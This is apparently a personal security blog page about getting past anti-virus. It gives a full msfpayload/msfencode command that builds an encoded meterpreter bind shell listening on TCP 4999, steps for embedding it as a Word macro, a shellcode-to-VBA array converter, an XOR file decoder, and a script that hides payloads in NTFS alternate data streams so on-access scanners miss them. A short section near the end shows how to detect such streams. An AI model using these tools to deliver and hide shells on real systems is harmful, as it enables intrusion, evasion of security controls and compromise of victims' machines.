______ Y ______

My own personal time capsule.

Category Archives: anty-virus

Avoiding Anti-Virus with msfencode and Office

Quite simple actually, provided that we know how to use msfencode templates (the -x option) to work with the payload. This can be done in a few simple steps:

1) Generate the payload with msfpayload
2) Pipe it to msfencode with the -x option (use e.g. psexec.exe as the template)
3) Use shellcode2vbs.py to turn the raw output into a VBS file holding a binary representation of the code
4) Paste the output into a macro in Word, Excel or anything else from the Office suite
5) Run the “ShellcodeExecute” macro from inside Office

So in the command prompt it looks like:

./msfpayload windows/meterpreter/bind_tcp LPORT=4999 R | msfencode -e x86/shikata_ga_nai -c 8 -x /pentest/windows-binaries/pstools/psexec.exe -t raw > BIND_4999.R && python /pentest/tools/custom/shellcode2vbs.py BIND_4999.R BIND_4999.vbs 

And finally copy & paste the content of ‘BIND_4999.vbs’ into an MS Word document as a macro. Now upload it to create a bind-shell listener on the system you have access to (the example above listens on TCP 4999).
This combines nicely with port forwarding if access to the system is restricted by e.g. a firewall, or if it sits in a DMZ.
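Step 3 above relies on a shellcode2vbs.py that is not shown on this page. The converter below is an added example (not the author's tool): it reads the raw bytes written by msfencode -t raw and emits the VBA Array() statements a macro can consume, and it parses its own output back so you can confirm the paste is a faithful copy of the payload. The line-length and continuation limits it respects are assumptions about the VBA editor, and the macro that copies the array into memory is assumed to exist and is not part of this example.

```python
#!/usr/bin/env python3
"""
Raw shellcode -> VBA array converter (added example, not the page's own
shellcode2vbs.py). Emits `buf = Array(...)` statements for an Office macro.

Assumed VBA editor limits (not stated on the page): a physical line should
stay under 1023 characters and one logical statement may use at most 24
" _" line continuations, so long payloads are split across several arrays.
"""
import re
import sys

BYTES_PER_LINE = 20        # 20 decimals per physical line keeps lines short
MAX_CONTINUATIONS = 24     # assumed VBA limit per logical statement
BYTES_PER_STATEMENT = BYTES_PER_LINE * (MAX_CONTINUATIONS + 1)


def to_vba_arrays(data: bytes, name: str = "buf") -> str:
    """Return VBA source declaring `data` as one or more Variant arrays.

    The first array is called `name`; overflow arrays are `name1`, `name2`, ...
    (the macro that copies them into executable memory is assumed, not shown).
    """
    if not data:
        raise ValueError("empty payload")
    statements = []
    for idx, start in enumerate(range(0, len(data), BYTES_PER_STATEMENT)):
        chunk = data[start:start + BYTES_PER_STATEMENT]
        rows = [
            ", ".join(str(b) for b in chunk[off:off + BYTES_PER_LINE])
            for off in range(0, len(chunk), BYTES_PER_LINE)
        ]
        var = name if idx == 0 else f"{name}{idx}"
        body = ", _\n    ".join(rows)          # " _" is VBA line continuation
        statements.append(f"Dim {var} As Variant\n{var} = Array({body})")
    return "\n".join(statements) + "\n"


_ARRAY_RE = re.compile(r"=\s*Array\((.*?)\)", re.S)


def from_vba_arrays(text: str) -> bytes:
    """Inverse of to_vba_arrays: rebuild the bytes from the VBA text.

    Used to verify that what gets pasted into the macro is the payload."""
    out = bytearray()
    for body in _ARRAY_RE.findall(text):
        body = body.replace("_\n", " ")         # drop continuation markers
        out.extend(int(tok) for tok in body.replace(",", " ").split())
    return bytes(out)


def main(argv):
    if len(argv) != 3:
        sys.exit(f"usage: {argv[0]} <shellcode.raw> <out.vbs>")
    with open(argv[1], "rb") as f:
        data = f.read()
    vba = to_vba_arrays(data)
    if from_vba_arrays(vba) != data:
        sys.exit("[-] round trip failed, refusing to write output")
    with open(argv[2], "w") as f:
        f.write(vba)
    print(f"[+] {len(data)} bytes written to {argv[2]}")


if __name__ == "__main__":
    main(sys.argv)
```

Run it as `python3 shellcode2vba.py BIND_4999.R BIND_4999.vbs` in place of the page's shellcode2vbs.py call; a meterpreter stager of a few hundred bytes fits in a single Array() statement, anything over 500 bytes is split so the macro compiles.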

Binary XOR decoder

Handy if you have a few binaries to reverse and need a quick and dirty way to XOR them with a given key. The key is passed as comma-separated hex bytes (a single byte such as 0xAA works too) and is repeated across the whole file; the output is written next to the input with a .decoded suffix.


#!/usr/bin/env python3
import sys

print("[+] XOR binary decoder by Y")
print("[+] Will perform an XOR decode on a file with the specified key")
print("[+] contact : If you know me then give me a shout")
print("[+] usage: ./xor_decode.py <FILE_PATH> <key>")
print("[+] example: ./xor_decode.py binary.bin 0xAA,0x00,0xAB")
print()


def parse_key(key_string):
    # key format 0xAA,0x11,0xAB .... -> list of byte values
    key = [int(k, 16) & 0xFF for k in key_string.split(",") if k.strip()]
    if not key:
        raise ValueError("empty key")
    return key


def decode(xored_file, key):
    with open(xored_file, "rb") as fh:
        buf = fh.read()

    # XOR every byte with the key, repeating the key as needed
    decoded = bytearray(len(buf))
    for i, b in enumerate(buf):
        decoded[i] = b ^ key[i % len(key)]

    out_name = xored_file + ".decoded"
    with open(out_name, "wb") as out:
        out.write(decoded)   # write the whole buffer, not the last byte
    print("[+] Written %d bytes to %s" % (len(decoded), out_name))


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("[-] usage: ./xor_decode.py <FILE_PATH> <key>")
    decode(sys.argv[1], parse_key(sys.argv[2]))

Alternate Data Streams File Hider In Python

Alternate Data Streams (ADS) are a nice little NTFS feature that, in practice, allows a file to be hidden in one of the extra ‘streams’ every NTFS file can carry. Not many anti-virus products check such streams, so it can be handy to launch a new process from an ADS that will not be picked up by the ‘on-access’ scan engine. The code below uses the Windows API (kernel32.dll again) to find fixed drives and write a file into an ADS of a randomly chosen host file.

Steps to follow:
1) Enumerate all the partitions
2) Keep only the fixed (local) drives
3) Get the list of the first 1000 files
4) Select one of the files from the list
5) Write the payload into an ADS of that file

NOTE: ADS do not survive compression (zip), copying to a non-NTFS volume (FAT32, most removable media, many network shares) or sending by e-mail, so once in place the host file can only be moved or copied between NTFS locations.


#!/usr/bin/env python3
print("[+] Alternate Data Stream Hider by Y")
print("[+] Will hide selected file in random ADS on the writable drive")
print("[+] contact : If you know me then give me a shout")
print("[+] usage: ./ads_hide.py <FILE_PATH>")
print()

# define imports
import ctypes
import os
import random
import shutil
import string
import sys

# define kernel32 dll (Windows only)
kernel32 = ctypes.windll.kernel32

DRIVE_FIXED = 3    # GetDriveType() return values
DRIVE_REMOTE = 4


def getDrives():
    print("[+] Enumerating the list of current partitions")
    drivebits = kernel32.GetLogicalDrives()   # bit 0 = A:, bit 1 = B:, ...
    partition_list = []
    for bit in range(26):
        if drivebits & (1 << bit):
            drive_letter = "%c:\\" % chr(ord("A") + bit)
            partition_list.append(drive_letter)
            print("\t[+] Found drive: %s" % drive_letter)
    return partition_list


def getDriveInfo(drives):
    # keep only fixed (local) disks; DRIVE_REMOTE and the rest are skipped
    clean_list = []
    for dx in drives:
        t = kernel32.GetDriveTypeW(dx)
        if t == DRIVE_FIXED:
            print("\t[+] Found Fixed Drive : %s" % dx)
            clean_list.append(dx)
    return clean_list


def genRandomPath(drive, limit=1000):
    # enumerate up to `limit` file paths on the drive (capped for speed)
    paths = []
    for dirname, dirnames, filenames in os.walk(drive):
        for nm in filenames:
            paths.append(os.path.join(dirname, nm))
            if len(paths) == limit:
                return paths
    return paths   # fewer than `limit` files on the drive


def getRandomDrive(list_writable_drives):
    print("[+] Selecting Partition")
    return random.choice(list_writable_drives)


def selectRandomPath(paths):
    print("[+] Choosing host file")
    return random.choice(paths)


def isFileWritable(filepath):
    print("[+] Checking File Write Permission")
    # ask the OS: this honours the read-only attribute and NTFS ACLs
    return os.access(filepath, os.W_OK)


def write(file, path):
    # random stream name, same extension as the file being hidden
    extension = os.path.splitext(file)[1]
    name = "".join(random.choice(string.ascii_letters + string.digits)
                   for x in range(random.randrange(4, 20)))
    stream = "%s:%s%s" % (path, name, extension)
    # open "host:stream" directly; no shell, so no quoting problems
    with open(file, "rb") as src, open(stream, "wb") as dst:
        shutil.copyfileobj(src, dst)
    print("[+] File Hidden In: %s" % stream)


def ADS_HIDE(FILE_PATH, attempts=5):
    drives = getDrives()
    print("[+] Checking Drive Type")
    list_to_write = getDriveInfo(drives)
    if not list_to_write:
        sys.exit("[-] No fixed drive found")
    drive_to_search = getRandomDrive(list_to_write)
    print("[+] Constructing ADS")
    paths = genRandomPath(drive_to_search)
    if not paths:
        sys.exit("[-] No files found on %s" % drive_to_search)
    # try a few random host files until one is writable
    for _ in range(attempts):
        path = selectRandomPath(paths)
        if isFileWritable(path):
            print("[+] Writing to ADS")
            write(FILE_PATH, path)
            return
    sys.exit("[-] Could not find a writable host file")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("[-] usage: ./ads_hide.py <FILE_PATH>")
    ADS_HIDE(sys.argv[1])
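The flip side of the hider is finding such streams again. `dir /r` prints every named stream of a file on its own line, so a small parser over that output is the quickest triage check on a box you suspect. The script below is an added example (not part of the original post): the listing it works on is constructed to mimic the `dir /r` layout and is not real system output, and the benign-stream list and executable-extension heuristic (which reflects the hider keeping the original file extension) are assumptions you should tune.

```python
#!/usr/bin/env python3
"""
Find alternate data streams in `dir /r` output (added example, not part of
the page's own tooling). `dir /r` lists each named stream of a file as
    <size> <file>:<stream>:$DATA
on its own line; the sample below is constructed to mimic that layout.
"""
import os
import re

# Constructed sample, not real output.
SAMPLE_DIR_R = """\
 Volume in drive C has no label.
 Directory of C:\\Users\\demo\\Downloads

03/01/2021  10:00 AM    <DIR>          .
03/01/2021  10:00 AM    <DIR>          ..
03/01/2021  10:05 AM             1,234 report.docx
                                    26 report.docx:Zone.Identifier:$DATA
03/01/2021  10:07 AM            52,200 readme.txt
                                73,802 readme.txt:Ab3kZ9.exe:$DATA
03/01/2021  10:09 AM             4,096 notes.txt
                                   120 notes.txt:draft.txt:$DATA
"""

# size, host file, stream name; the unnamed default stream is never listed,
# so every match is an *alternate* stream.
_STREAM_RE = re.compile(r"^\s*([\d,]+)\s+(.+?):([^:\\]+):\$DATA\s*$")

# Streams expected on a normal workstation (assumed allow-list, extend it).
BENIGN_STREAMS = {"Zone.Identifier"}   # mark-of-the-web on downloaded files

# Stream names that look like something meant to be run (assumed heuristic).
EXEC_EXT = {".exe", ".dll", ".scr", ".com", ".bat", ".cmd", ".ps1", ".vbs", ".js"}


def parse_streams(text):
    """Return [(host_file, stream_name, size_bytes), ...] for every ADS."""
    found = []
    for line in text.splitlines():
        m = _STREAM_RE.match(line)
        if m:
            size = int(m.group(1).replace(",", ""))
            found.append((m.group(2), m.group(3), size))
    return found


def suspicious_streams(text):
    """Drop known-benign streams; flag the rest, marking executable-looking
    names with True in the last field so they can be triaged first."""
    hits = []
    for host, stream, size in parse_streams(text):
        if stream in BENIGN_STREAMS:
            continue
        ext = os.path.splitext(stream)[1].lower()
        hits.append((host, stream, size, ext in EXEC_EXT))
    return hits


if __name__ == "__main__":
    for host, stream, size, is_exec in suspicious_streams(SAMPLE_DIR_R):
        flag = "EXEC" if is_exec else "data"
        print("[%s] %s:%s (%d bytes)" % (flag, host, stream, size))
```

On a live system feed it the real listing (`dir /r /s C:\ > streams.txt`, then point `parse_streams` at the file's content); PowerShell's `Get-Item -Path <file> -Stream *` and `Get-Content -Path <file> -Stream <name>` let you inspect or pull out a stream once it is found, and the stream is also what an on-demand scanner should be pointed at.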


Again, this code is here only for the educational purposes.